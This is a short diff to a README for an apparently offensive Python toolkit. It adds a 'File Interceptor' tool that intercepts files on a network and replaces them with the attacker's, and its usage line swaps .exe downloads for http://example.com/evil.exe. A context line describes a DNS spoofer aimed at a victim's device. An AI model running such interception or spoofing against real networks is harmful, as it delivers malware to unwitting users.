vxfemboy/python_tools/README.md

 `-i, -iface, -interface` for your interface

+## File Interceptor
+A tool to intercept files on the network and replace them with the attackers

+Usage: `intercept.py -e .exe -s http://example.com/evil.exe`

+`-e, --ext` for your extension you want to replace

+`-u --url` for the url of the file to change

 ## DNS Spoofer
 A tool to spoof DNS traffic from the victims device to the Attacker